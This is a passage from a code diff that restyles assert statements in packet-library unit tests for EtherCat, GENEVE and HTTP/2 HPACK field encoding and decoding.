-assert(len(frm) == 60) +assert len(frm) == 60 frm = Ether(frm.do_build()) -assert(frm[EtherCat].length == 0) +assert frm[EtherCat].length == 0 = EtherCat and RawPayload frm=Ether()/EtherCat()/Raw(b'0123456789') -assert(len(frm) == 60) +assert len(frm) == 60 frm = Ether(frm.do_build()) -assert(frm[EtherCat].length == 10) +assert frm[EtherCat].length == 10 frm = Ether()/EtherCat()/Raw(b'012345678901234567890123456789012345678901234567890123456789') frm = Ether(frm.do_build()) -assert(len(frm) == 76) -assert(frm[EtherCat].length == 60) +assert len(frm) == 76 +assert frm[EtherCat].length == 60 = EtherCat - test invalid length detection @@ -185,9 +185,9 @@ nums_4_bits = [random.randint(0, 16) & 0b1111 for dummy in range(0, 23)] frm = Ether()/EtherCat()/EtherCatAPRD(adp=0x1234, ado=0x5678, irq=0xbad0, wkc=0xbeef, data=[1]*2035, c=1) frm = Ether(frm.do_build()) -assert(frm[EtherCat].length == 2047) -assert(len(frm[EtherCatAPRD].data) == 2035) -assert(frm[EtherCatAPRD].c == 1) +assert frm[EtherCat].length == 2047 +assert len(frm[EtherCatAPRD].data) == 2035 +assert frm[EtherCatAPRD].c == 1 data_oversized = False try: @@ -195,25 +195,25 @@ try: frm = Ether(frm.do_build()) except ValueError as err: data_oversized = True - assert('data size' in str(err)) + assert 'data size' in str(err) -assert(data_oversized == True) +assert data_oversized == True dlpdu_oversized = False try: frm = Ether()/EtherCat()/EtherCatAPRD(adp=0x1234, ado=0x5678, irq=0xbad0, wkc=0xbeef, data=[2]*2036, c=1) frm = Ether(frm.do_build()) except ValueError as err: dlpdu_oversized = True - assert('EtherCat message' in str(err)) + assert 'EtherCat message' in str(err) -assert(dlpdu_oversized == True) +assert dlpdu_oversized == True frm = Ether()/EtherCat(_reserved=1)/EtherCatAPRD(adp=0x1234, ado=0x5678, irq=0xbad0, wkc=0xbeef, data=[3], c=0) frm = Ether(frm.do_build()) -assert(frm[EtherCatAPRD].c == 0) +assert frm[EtherCatAPRD].c == 0 -assert(frm[EtherCat]._reserved == 0) +assert frm[EtherCat]._reserved == 0 = EtherCat and Type12 DLPDU layers @@ -223,7 +223,7 @@ for type_id in EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES: frm = Ether(frm.do_build()) # expect to have one layer of current Type12 DLPDU type dlpdu_lyr = frm[EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[type_id]] - assert(dlpdu_lyr.data == data) + assert dlpdu_lyr.data == data = EtherCat and Type12 DLPDU layer using structure used for physical and broadcast addressing @@ -232,11 +232,11 @@ test_data = [121,99,110,104,114,109,58,41] frm = Ether()/EtherCat()/EtherCatAPRD(adp=0x1234, ado=0x5678, irq=0xbad0, wkc=0xbeef, data=test_data) frm = Ether(frm.do_build()) aprd_lyr = frm[EtherCatAPRD] -assert(aprd_lyr.adp == 0x1234) -assert(aprd_lyr.ado == 0x5678) -assert(aprd_lyr.irq == 0xbad0) -assert(aprd_lyr.wkc == 0xbeef) -assert(aprd_lyr.data == test_data) +assert aprd_lyr.adp == 0x1234 +assert aprd_lyr.ado == 0x5678 +assert aprd_lyr.irq == 0xbad0 +assert aprd_lyr.wkc == 0xbeef +assert aprd_lyr.data == test_data = EtherCat and Type12 DLPDU layer using structure used for logical addressing @@ -262,5 +262,5 @@ for outer_dummy in range(10): frm = Ether(frm.do_build()) idx = 0 for layer_id in layer_ids: - assert(type(EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[layer_id]()) == type(frm[2 + idx])) + assert type(EtherCat.ETHERCAT_TYPE12_DLPDU_TYPES[layer_id]()) == type(frm[2 + idx]) idx += 1 diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index 2c43432ce08..5811f56741b 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -8,19 +8,19 @@ = Build & dissect - GENEVE encapsulates Ether s = raw(IP()/UDP(sport=10000)/GENEVE()/Ether(dst='00:01:00:11:11:11',src='00:02:00:22:22:22')) -assert(s == b'E\x00\x002\x00\x01\x00\x00@\x11|\xb8\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00\x1e\x9a\x1c\x00\x00eX\x00\x00\x00\x00\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00') +assert s == b'E\x00\x002\x00\x01\x00\x00@\x11|\xb8\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00\x1e\x9a\x1c\x00\x00eX\x00\x00\x00\x00\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00' p = IP(s) -assert(GENEVE in p and Ether in p[GENEVE].payload) +assert GENEVE in p and Ether in p[GENEVE].payload = Build & dissect - GENEVE with options encapsulates Ether s = raw(IP()/UDP(sport=10000)/GENEVE(critical=1, options=b'\x00\x01\x81\x02\x0a\x0a\x0b\x0b')/Ether(dst='00:01:00:11:11:11',src='00:02:00:22:22:22')) -assert(s == b'E\x00\x00:\x00\x01\x00\x00@\x11|\xb0\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00&\x01\xb4\x02@eX\x00\x00\x00\x00\x00\x01\x81\x02\n\n\x0b\x0b\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00') +assert s == b'E\x00\x00:\x00\x01\x00\x00@\x11|\xb0\x7f\x00\x00\x01\x7f\x00\x00\x01\'\x10\x17\xc1\x00&\x01\xb4\x02@eX\x00\x00\x00\x00\x00\x01\x81\x02\n\n\x0b\x0b\x00\x01\x00\x11\x11\x11\x00\x02\x00"""\x90\x00' p = IP(s) -assert(GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].critical == 1 and p[GENEVE].optionlen == 2) +assert GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].critical == 1 and p[GENEVE].optionlen == 2 = Build & dissect - GENEVE with metadata options encapsulates Ether @@ -28,23 +28,23 @@ s = raw(Ether()/Dot1Q()/IP()/UDP(sport=57025,dport=6081)/GENEVE(proto=0x6558,opt assert (s == b'\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x81\x00\x00\x01\x08\x00E\x00\x00V\x00\x01\x00\x00@\x11|\x94\x7f\x00\x00\x01\x7f\x00\x00\x01\xde\xc1\x17\xc1\x00B\x1a\x86\x02\x00eX\x00\x00\x00\x00\x01\x02\x80\x01\x00\x01\x00\x02\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x08\x00E\x00\x00\x1c\x00\x01\x00\x00@\x01|\xde\x7f\x00\x00\x01\x7f\x00\x00\x01\x08\x00\xf7\xff\x00\x00\x00\x00') p = Ether(s) -assert(GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].proto == 0x6558 and p[GeneveOptions].length == 1 and p[GeneveOptions].classid == 0x102 and p[GeneveOptions].type == 0x80) +assert GENEVE in p and Ether in p[GENEVE].payload and p[GENEVE].proto == 0x6558 and p[GeneveOptions].length == 1 and p[GeneveOptions].classid == 0x102 and p[GeneveOptions].type == 0x80 = Build & dissect - GENEVE encapsulates IPv4 s = raw(IP()/UDP(sport=10000)/GENEVE()/IP()) -assert(s == b"E\x00\x008\x00\x01\x00\x00@\x11|\xb2\x7f\x00\x00\x01\x7f\x00\x00\x01'\x10\x17\xc1\x00$\xba\xd2\x00\x00\x08\x00\x00\x00\x00\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01") +assert s == b"E\x00\x008\x00\x01\x00\x00@\x11|\xb2\x7f\x00\x00\x01\x7f\x00\x00\x01'\x10\x17\xc1\x00$\xba\xd2\x00\x00\x08\x00\x00\x00\x00\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x01" p = IP(s) -assert(GENEVE in p and IP in p[GENEVE].payload) +assert GENEVE in p and IP in p[GENEVE].payload = Build & dissect - GENEVE encapsulates IPv6 s = raw(IP()/UDP(sport=10000)/GENEVE()/IPv6()) -assert(s == b"E\x00\x00L\x00\x01\x00\x00@\x11|\x9e\x7f\x00\x00\x01\x7f\x00\x00\x01'\x10\x17\xc1\x008\xa0\x8a\x00\x00\x86\xdd\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01") +assert s == b"E\x00\x00L\x00\x01\x00\x00@\x11|\x9e\x7f\x00\x00\x01\x7f\x00\x00\x01'\x10\x17\xc1\x008\xa0\x8a\x00\x00\x86\xdd\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" p = IP(s) -assert(GENEVE in p and IPv6 in p[GENEVE].payload) +assert GENEVE in p and IPv6 in p[GENEVE].payload = GENEVE - Answers diff --git a/test/contrib/http2.uts b/test/contrib/http2.uts index 96150f237a2..26ac760bcff 100644 --- a/test/contrib/http2.uts +++ b/test/contrib/http2.uts @@ -29,32 +29,32 @@ def expect_exception(e, c): f = h2.UVarIntField('value', 0, 5) expect_exception(AssertionError, 'f.any2i(None, None)') -assert(f.any2i(None, 0) == 0) -assert(f.any2i(None, 3) == 3) -assert(f.any2i(None, 1<<5) == 1<<5) -assert(f.any2i(None, 1<<16) == 1<<16) +assert f.any2i(None, 0) == 0 +assert f.any2i(None, 3) == 3 +assert f.any2i(None, 1<<5) == 1<<5 +assert f.any2i(None, 1<<16) == 1<<16 f = h2.UVarIntField('value', 0, 8) -assert(f.any2i(None, b'\x1E') == 30) +assert f.any2i(None, b'\x1E') == 30 = HTTP/2 UVarIntField.m2i on full byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 8) -assert(f.m2i(None, b'\x00') == 0) -assert(f.m2i(None, b'\x03') == 3) -assert(f.m2i(None, b'\xFE') == 254) -assert(f.m2i(None, b'\xFF\x00') == 255) -assert(f.m2i(None, b'\xFF\xFF\x03') == 766) #0xFF + (0xFF ^ 0x80) + (3<<7) +assert f.m2i(None, b'\x00') == 0 +assert f.m2i(None, b'\x03') == 3 +assert f.m2i(None, b'\xFE') == 254 +assert f.m2i(None, b'\xFF\x00') == 255 +assert f.m2i(None, b'\xFF\xFF\x03') == 766 #0xFF + (0xFF ^ 0x80) + (3<<7 = HTTP/2 UVarIntField.m2i on partial byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 5) -assert(f.m2i(None, (b'\x00', 3)) == 0) -assert(f.m2i(None, (b'\x03', 3)) == 3) -assert(f.m2i(None, (b'\x1e', 3)) == 30) -assert(f.m2i(None, (b'\x1f\x00', 3)) == 31) -assert(f.m2i(None, (b'\x1f\xe1\xff\x03', 3)) == 65536) +assert f.m2i(None, (b'\x00', 3)) == 0 +assert f.m2i(None, (b'\x03', 3)) == 3 +assert f.m2i(None, (b'\x1e', 3)) == 30 +assert f.m2i(None, (b'\x1f\x00', 3)) == 31 +assert f.m2i(None, (b'\x1f\xe1\xff\x03', 3)) == 65536 = HTTP/2 UVarIntField.getfield on full byte ~ http2 frame field uvarintfield @@ -62,24 +62,24 @@ assert(f.m2i(None, (b'\x1f\xe1\xff\x03', 3)) == 65536) f = h2.UVarIntField('value', 0, 8) r = f.getfield(None, b'\x00\x00') -assert(r[0] == b'\x00') -assert(r[1] == 0) +assert r[0] == b'\x00' +assert r[1] == 0 r = f.getfield(None, b'\x03\x00') -assert(r[0] == b'\x00') -assert(r[1] == 3) +assert r[0] == b'\x00' +assert r[1] == 3 r = f.getfield(None, b'\xFE\x00') -assert(r[0] == b'\x00') -assert(r[1] == 254) +assert r[0] == b'\x00' +assert r[1] == 254 r = f.getfield(None, b'\xFF\x00\x00') -assert(r[0] == b'\x00') -assert(r[1] == 255) +assert r[0] == b'\x00' +assert r[1] == 255 r = f.getfield(None, b'\xFF\xFF\x03\x00') -assert(r[0] == b'\x00') -assert(r[1] == 766) +assert r[0] == b'\x00' +assert r[1] == 766 = HTTP/2 UVarIntField.getfield on partial byte ~ http2 frame field uvarintfield @@ -87,88 +87,88 @@ assert(r[1] == 766) f = h2.UVarIntField('value', 0, 5) r = f.getfield(None, (b'\x00\x00', 3)) -assert(r[0] == b'\x00') -assert(r[1] == 0) +assert r[0] == b'\x00' +assert r[1] == 0 r = f.getfield(None, (b'\x03\x00', 3)) -assert(r[0] == b'\x00') -assert(r[1] == 3) +assert r[0] == b'\x00' +assert r[1] == 3 r = f.getfield(None, (b'\x1e\x00', 3)) -assert(r[0] == b'\x00') -assert(r[1] == 30) +assert r[0] == b'\x00' +assert r[1] == 30 r = f.getfield(None, (b'\x1f\x00\x00', 3)) -assert(r[0] == b'\x00') -assert(r[1] == 31) +assert r[0] == b'\x00' +assert r[1] == 31 r = f.getfield(None, (b'\x1f\xe1\xff\x03\x00', 3)) -assert(r[0] == b'\x00') -assert(r[1] == 65536) +assert r[0] == b'\x00' +assert r[1] == 65536 = HTTP/2 UVarIntField.i2m on full byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 8) -assert(f.i2m(None, 0) == b'\x00') -assert(f.i2m(None, 3) == b'\x03') -assert(f.i2m(None, 254).lower() == b'\xfe') -assert(f.i2m(None, 255).lower() == b'\xff\x00') -assert(f.i2m(None, 766).lower() == b'\xff\xff\x03') +assert f.i2m(None, 0) == b'\x00' +assert f.i2m(None, 3) == b'\x03' +assert f.i2m(None, 254).lower() == b'\xfe' +assert f.i2m(None, 255).lower() == b'\xff\x00' +assert f.i2m(None, 766).lower() == b'\xff\xff\x03' = HTTP/2 UVarIntField.i2m on partial byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 5) -assert(f.i2m(None, 0) == b'\x00') -assert(f.i2m(None, 3) == b'\x03') -assert(f.i2m(None, 30).lower() == b'\x1e') -assert(f.i2m(None, 31).lower() == b'\x1f\x00') -assert(f.i2m(None, 65536).lower() == b'\x1f\xe1\xff\x03') +assert f.i2m(None, 0) == b'\x00' +assert f.i2m(None, 3) == b'\x03' +assert f.i2m(None, 30).lower() == b'\x1e' +assert f.i2m(None, 31).lower() == b'\x1f\x00' +assert f.i2m(None, 65536).lower() == b'\x1f\xe1\xff\x03' = HTTP/2 UVarIntField.addfield on full byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 8) -assert(f.addfield(None, b'Toto', 0) == b'Toto\x00') -assert(f.addfield(None, b'Toto', 3) == b'Toto\x03') -assert(f.addfield(None, b'Toto', 254).lower() == b'toto\xfe') -assert(f.addfield(None, b'Toto', 255).lower() == b'toto\xff\x00') -assert(f.addfield(None, b'Toto', 766).lower() == b'toto\xff\xff\x03') +assert f.addfield(None, b'Toto', 0) == b'Toto\x00' +assert f.addfield(None, b'Toto', 3) == b'Toto\x03' +assert f.addfield(None, b'Toto', 254).lower() == b'toto\xfe' +assert f.addfield(None, b'Toto', 255).lower() == b'toto\xff\x00' +assert f.addfield(None, b'Toto', 766).lower() == b'toto\xff\xff\x03' = HTTP/2 UVarIntField.addfield on partial byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 5) -assert(f.addfield(None, (b'Toto', 3, 4), 0) == b'Toto\x80') -assert(f.addfield(None, (b'Toto', 3, 4), 3) == b'Toto\x83') -assert(f.addfield(None, (b'Toto', 3, 4), 30).lower() == b'toto\x9e') -assert(f.addfield(None, (b'Toto', 3, 4), 31).lower() == b'toto\x9f\x00') -assert(f.addfield(None, (b'Toto', 3, 4), 65536).lower() == b'toto\x9f\xe1\xff\x03') +assert f.addfield(None, (b'Toto', 3, 4), 0) == b'Toto\x80' +assert f.addfield(None, (b'Toto', 3, 4), 3) == b'Toto\x83' +assert f.addfield(None, (b'Toto', 3, 4), 30).lower() == b'toto\x9e' +assert f.addfield(None, (b'Toto', 3, 4), 31).lower() == b'toto\x9f\x00' +assert f.addfield(None, (b'Toto', 3, 4), 65536).lower() == b'toto\x9f\xe1\xff\x03' = HTTP/2 UVarIntField.i2len on full byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 8) -assert(f.i2len(None, 0) == 1) -assert(f.i2len(None, 3) == 1) -assert(f.i2len(None, 254) == 1) -assert(f.i2len(None, 255) == 2) -assert(f.i2len(None, 766) == 3) +assert f.i2len(None, 0) == 1 +assert f.i2len(None, 3) == 1 +assert f.i2len(None, 254) == 1 +assert f.i2len(None, 255) == 2 +assert f.i2len(None, 766) == 3 = HTTP/2 UVarIntField.i2len on partial byte ~ http2 frame field uvarintfield f = h2.UVarIntField('value', 0, 5) -assert(f.i2len(None, 0) == 1) -assert(f.i2len(None, 3) == 1) -assert(f.i2len(None, 30) == 1) -assert(f.i2len(None, 31) == 2) -assert(f.i2len(None, 65536) == 4) +assert f.i2len(None, 0) == 1 +assert f.i2len(None, 3) == 1 +assert f.i2len(None, 30) == 1 +assert f.i2len(None, 31) == 2 +assert f.i2len(None, 65536) == 4 + HTTP/2 FieldUVarLenField Test Suite @@ -184,11 +184,11 @@ class TrivialPacket(Packet): StrField('data', '') ] -assert(f.i2m(TrivialPacket(data='a'*5), None) == b'\x05') -assert(f.i2m(TrivialPacket(data='a'*255), None).lower() == b'\xff\x00') -assert(f.i2m(TrivialPacket(data='a'), 2) == b'\x02') -assert(f.i2m(None, 2) == b'\x02') -assert(f.i2m(None, 0) == b'\x00') +assert f.i2m(TrivialPacket(data='a'*5), None) == b'\x05' +assert f.i2m(TrivialPacket(data='a'*255), None).lower() == b'\xff\x00' +assert f.i2m(TrivialPacket(data='a'), 2) == b'\x02' +assert f.i2m(None, 2) == b'\x02' +assert f.i2m(None, 0) == b'\x00' = HTTP/2 FieldUVarLenField.i2m with adjustment ~ http2 frame field fielduvarlenfield @@ -201,10 +201,10 @@ class TrivialPacket(Packet): ] f = h2.FieldUVarLenField('value', None, 8, length_of='data', adjust=lambda x: x-1) -assert(f.i2m(TrivialPacket(data='a'*5), None) == b'\x04') -assert(f.i2m(TrivialPacket(data='a'*255), None).lower() == b'\xfe') +assert f.i2m(TrivialPacket(data='a'*5), None) == b'\x04' +assert f.i2m(TrivialPacket(data='a'*255), None).lower() == b'\xfe' #Adjustment does not affect non-None value! -assert(f.i2m(TrivialPacket(data='a'*3), 2) == b'\x02') +assert f.i2m(TrivialPacket(data='a'*3), 2) == b'\x02' + HTTP/2 HPackZString Test Suite @@ -213,26 +213,26 @@ assert(f.i2m(TrivialPacket(data='a'*3), 2) == b'\x02') string = 'Test' s = h2.HPackZString(string) -assert(len(s) == 3) -assert(raw(s) == b"\xdeT'") -assert(s.origin() == string) +assert len(s) == 3 +assert raw(s) == b"\xdeT'" +assert s.origin() == string string = 'a'*65535 s = h2.HPackZString(string) -assert(len(s) == 40960) -assert(raw(s) == (b'\x18\xc61\x8cc' * 8191) + b'\x18\xc61\x8c\x7f') -assert(s.origin() == string) +assert len(s) == 40960 +assert raw(s) == (b'\x18\xc61\x8cc' * 8191) + b'\x18\xc61\x8c\x7f' +assert s.origin() == string = HTTP/2 HPackZString Decompression ~ http2 hpack huffman s = b"\xdeT'" i, ibl = h2.HPackZString.huffman_conv2bitstring(s) -assert(b'Test' == h2.HPackZString.huffman_decode(i, ibl)) +assert b'Test' == h2.HPackZString.huffman_decode(i, ibl) s = (b'\x18\xc61\x8cc' * 8191) + b'\x18\xc61\x8c\x7f' i, ibl = h2.HPackZString.huffman_conv2bitstring(s) -assert(b'a'*65535 == h2.HPackZString.huffman_decode(i, ibl)) +assert b'a'*65535 == h2.HPackZString.huffman_decode(i, ibl) assert( expect_exception(h2.InvalidEncodingException, @@ -254,12 +254,12 @@ class TrivialPacket(Packet): ] s = f.m2i(TrivialPacket(type=0, len=4), b'Test') -assert(isinstance(s, h2.HPackLiteralString)) -assert(s.origin() == 'Test') +assert isinstance(s, h2.HPackLiteralString) +assert s.origin() == 'Test' s = f.m2i(TrivialPacket(type=1, len=3), b"\xdeT'") -assert(isinstance(s, h2.HPackZString)) -assert(s.origin() == 'Test') +assert isinstance(s, h2.HPackZString) +assert s.origin() == 'Test' = HTTP/2 HPackStrLenField.any2i ~ http2 hpack field hpackstrlenfield @@ -274,33 +274,33 @@ class TrivialPacket(Packet): ] s = f.any2i(TrivialPacket(type=0, len=4), b'Test') -assert(isinstance(s, h2.HPackLiteralString)) -assert(s.origin() == 'Test') +assert isinstance(s, h2.HPackLiteralString) +assert s.origin() == 'Test' s = f.any2i(TrivialPacket(type=1, len=3), b"\xdeT'") -assert(isinstance(s, h2.HPackZString)) -assert(s.origin() == 'Test') +assert isinstance(s, h2.HPackZString) +assert s.origin() == 'Test' s = h2.HPackLiteralString('Test') s2 = f.any2i(TrivialPacket(type=0, len=4), s) -assert(s.origin() == s2.origin()) +assert s.origin() == s2.origin() s = h2.HPackZString('Test') s2 = f.any2i(TrivialPacket(type=1, len=3), s) -assert(s.origin() == s2.origin()) +assert s.origin() == s2.origin() s = h2.HPackLiteralString('Test') s2 = f.any2i(None, s) -assert(s.origin() == s2.origin()) +assert s.origin() == s2.origin() s = h2.HPackZString('Test') s2 = f.any2i(None, s) -assert(s.origin() == s2.origin()) +assert s.origin() == s2.origin() # Verifies that one can fuzz s = h2.HPackLiteralString('Test') s2 = f.any2i(TrivialPacket(type=1, len=1), s) -assert(s.origin() == s2.origin()) +assert s.origin() == s2.origin() = HTTP/2 HPackStrLenField.i2m ~ http2 hpack field hpackstrlenfield @@ -309,11 +309,11 @@ f = h2.HPackStrLenField('data', h2.HPackLiteralString(''), length_from=lambda p: s = b'Test' s2 = f.i2m(None, h2.HPackLiteralString(s)) -assert(s == s2) +assert s == s2 s = b'Test' s2 = f.i2m(None, h2.HPackZString(s)) -assert(s2 == b"\xdeT'") +assert s2 == b"\xdeT'" = HTTP/2 HPackStrLenField.addfield ~ http2 hpack field hpackstrlenfield @@ -322,11 +322,11 @@ f = h2.HPackStrLenField('data', h2.HPackLiteralString(''), length_from=lambda p: s = b'Test' s2 = f.addfield(None, b'Toto', h2.HPackLiteralString(s)) -assert(b'Toto' + s == s2) +assert b'Toto' + s == s2 s = b'Test' s2 = f.addfield(None, b'Toto', h2.HPackZString(s)) -assert(s2 == b"Toto\xdeT'") +assert s2 == b"Toto\xdeT'" = HTTP/2 HPackStrLenField.getfield ~ http2 hpack field hpackstrlenfield @@ -341,16 +341,16 @@ class TrivialPacket(Packet): ] r = f.getfield(TrivialPacket(type=0, len=4), b'TestToto') -assert(isinstance(r, tuple)) -assert(r[0] == b'Toto') -assert(isinstance(r[1], h2.HPackLiteralString)) -assert(r[1].origin() == 'Test') +assert isinstance(r, tuple) +assert r[0] == b'Toto' +assert isinstance(r[1], h2.HPackLiteralString) +assert r[1].origin() == 'Test' r = f.getfield(TrivialPacket(type=1, len=3), b"\xdeT'Toto") -assert(isinstance(r, tuple)) -assert(r[0] == b'Toto') -assert(isinstance(r[1], h2.HPackZString)) -assert(r[1].origin() == 'Test') +assert isinstance(r, tuple) +assert r[0] == b'Toto' +assert isinstance(r[1], h2.HPackZString) +assert r[1].origin() == 'Test' = HTTP/2 HPackStrLenField.i2h / i2repr ~ http2 hpack field hpackstrlenfield @@ -358,11 +358,11 @@ assert(r[1].origin() == 'Test') f = h2.HPackStrLenField('data', h2.HPackLiteralString(''), length_from=lambda p: p.len, type_from='type') s = b'Test' -assert(f.i2h(None, h2.HPackLiteralString(s)) == 'HPackLiteralString(Test)') -assert(f.i2repr(None, h2.HPackLiteralString(s)) == repr('HPackLiteralString(Test)')) +assert f.i2h(None, h2.HPackLiteralString(s)) == 'HPackLiteralString(Test)' +assert f.i2repr(None, h2.HPackLiteralString(s)) == repr('HPackLiteralString(Test)') -assert(f.i2h(None, h2.HPackZString(s)) == 'HPackZString(Test)') -assert(f.i2repr(None, h2.HPackZString(s)) == repr('HPackZString(Test)')) +assert f.i2h(None, h2.HPackZString(s)) == 'HPackZString(Test)' +assert f.i2repr(None, h2.HPackZString(s)) == repr('HPackZString(Test)') = HTTP/2 HPackStrLenField.i2len ~ http2 hpack field hpackstrlenfield @@ -370,8 +370,8 @@ assert(f.i2repr(None, h2.HPackZString(s)) == repr('HPackZString(Test)')) f = h2.HPackStrLenField('data', h2.HPackLiteralString(''), length_from=lambda p: p.len, type_from='type') s = b'Test' -assert(f.i2len(None, h2.HPackLiteralString(s)) == 4) -assert(f.i2len(None, h2.HPackZString(s)) == 3) +assert f.i2len(None, h2.HPackLiteralString(s)) == 4 +assert f.i2len(None, h2.HPackZString(s)) == 3 + HTTP/2 HPackMagicBitField Test Suite # Magic bits are not supposed to be modified and if they are anyway, they must @@ -382,18 +382,18 @@ assert(f.i2len(None, h2.HPackZString(s)) == 3) f = h2.HPackMagicBitField('value', 3, 2) r = f.addfield(None, b'Toto', 3) -assert(isinstance(r, tuple)) -assert(r[0] == b'Toto') -assert(r[1] == 2) -assert(r[2] == 3) +assert isinstance(r, tuple) +assert r[0] == b'Toto' +assert r[1] == 2 +assert r[2] == 3 r = f.addfield(None, (b'Toto', 2, 1) , 3) -assert(isinstance(r, tuple)) -assert(r[0] == b'Toto') -assert(r[1] == 4) -assert(r[2] == 7) +assert isinstance(r, tuple) +assert r[0] == b'Toto' +assert r[1] == 4 +assert r[2] == 7 -assert(expect_exception(AssertionError, 'f.addfield(None, "toto", 2)')) +assert expect_exception(AssertionError, 'f.addfield(None, "toto", 2)') = HTTP/2 HPackMagicBitField.getfield ~ http2 hpack field hpackmagicbitfield @@ -401,20 +401,20 @@ assert(expect_exception(AssertionError, 'f.addfield(None, "toto", 2)')) f = h2.HPackMagicBitField('value', 3, 2) r = f.getfield(None, b'\xc0') -assert(isinstance(r, tuple)) -assert(len(r) == 2) -assert(isinstance(r[0], tuple)) -assert(len(r[0]) == 2) -assert(r[0][0] == b'\xc0') -assert(r[0][1] == 2) -assert(r[1] == 3) +assert isinstance(r, tuple) +assert len(r) == 2 +assert isinstance(r[0], tuple) +assert len(r[0]) == 2 +assert r[0][0] == b'\xc0' +assert r[0][1] == 2 +assert r[1] == 3 r = f.getfield(None, (b'\x03', 6)) -assert(isinstance(r, tuple)) -assert(len(r) == 2) -assert(isinstance(r[0], bytes)) -assert(r[0] == b'') -assert(r[1] == 3) +assert isinstance(r, tuple) +assert len(r) == 2 +assert isinstance(r[0], bytes) +assert r[0] == b'' +assert r[1] == 3 expect_exception(AssertionError, 'f.getfield(None, b"\\x80")') @@ -422,28 +422,28 @@ expect_exception(AssertionError, 'f.getfield(None, b"\\x80")') ~ http2 hpack field hpackmagicbitfield f = h2.HPackMagicBitField('value', 3, 2) -assert(f.h2i(None, 3) == 3) +assert f.h2i(None, 3) == 3 expect_exception(AssertionError, 'f.h2i(None, 2)') = HTTP/2 HPackMagicBitField.m2i ~ http2 hpack field hpackmagicbitfield f = h2.HPackMagicBitField('value', 3, 2) -assert(f.m2i(None, 3) == 3) +assert f.m2i(None, 3) == 3 expect_exception(AssertionError, 'f.m2i(None, 2)') = HTTP/2 HPackMagicBitField.i2m ~ http2 hpack field hpackmagicbitfield f = h2.HPackMagicBitField('value', 3, 2) -assert(f.i2m(None, 3) == 3) +assert f.i2m(None, 3) == 3 expect_exception(AssertionError, 'f.i2m(None, 2)') = HTTP/2 HPackMagicBitField.any2i ~ http2 hpack field hpackmagicbitfield f = h2.HPackMagicBitField('value', 3, 2) -assert(f.any2i(None, 3) == 3) +assert f.any2i(None, 3) == 3 expect_exception(AssertionError, 'f.any2i(None, 2)') + HTTP/2 HPackHdrString Test Suite @@ -452,29 +452,29 @@ expect_exception(AssertionError, 'f.any2i(None, 2)') ~ http2 pack dissect hpackhdrstring p = h2.HPackHdrString(b'\x04Test') -assert(p.type == 0) -assert(p.len == 4) -assert(isinstance(p.getfieldval('data'), h2.HPackLiteralString)) -assert(p.getfieldval('data').origin() == 'Test') +assert p.type == 0 +assert p.len == 4 +assert isinstance(p.getfieldval('data'), h2.HPackLiteralString) +assert p.getfieldval('data').origin() == 'Test' p = h2.HPackHdrString(b"\x83\xdeT'") -assert(p.type == 1) -assert(p.len == 3) -assert(isinstance(p.getfieldval('data'), h2.HPackZString)) -assert(p.getfieldval('data').origin() == 'Test') +assert p.type == 1 +assert p.len == 3 +assert isinstance(p.getfieldval('data'), h2.HPackZString) +assert p.getfieldval('data').origin() == 'Test' = HTTP/2 Build HPackHdrString ~ http2 hpack build hpackhdrstring p = h2.HPackHdrString(data=h2.HPackLiteralString('Test')) -assert(raw(p) == b'\x04Test') +assert raw(p) == b'\x04Test' p = h2.HPackHdrString(data=h2.HPackZString('Test')) -assert(raw(p) == b"\x83\xdeT'") +assert raw(p) == b"\x83\xdeT'" #Fuzzing-able tests p = h2.HPackHdrString(type=1, len=3, data=h2.HPackLiteralString('Test')) -assert(raw(p) == b'\x83Test') +assert raw(p) == b'\x83Test' + HTTP/2 HPackIndexedHdr Test Suite @@ -482,21 +482,21 @@ assert(raw(p) == b'\x83Test') ~ http2 hpack dissect hpackindexedhdr p = h2.HPackIndexedHdr(b'\x80') -assert(p.magic == 1) -assert(p.index == 0) +assert p.magic == 1 +assert p.index == 0 p = h2.HPackIndexedHdr(b'\xFF\x00') -assert(p.magic == 1) -assert(p.index == 127) +assert p.magic == 1 +assert p.index == 127 = HTTP/2 Build HPackIndexedHdr ~ http2 hpack build hpackindexedhdr p = h2.HPackIndexedHdr(index=0) -assert(raw(p) == b'\x80') +assert raw(p) == b'\x80' p = h2.HPackIndexedHdr(index=127) -assert(raw(p) == b'\xFF\x00') +assert raw(p) == b'\xFF\x00' + HTTP/2 HPackLitHdrFldWithIncrIndexing Test Suite @@ -504,28 +504,28 @@ assert(raw(p) == 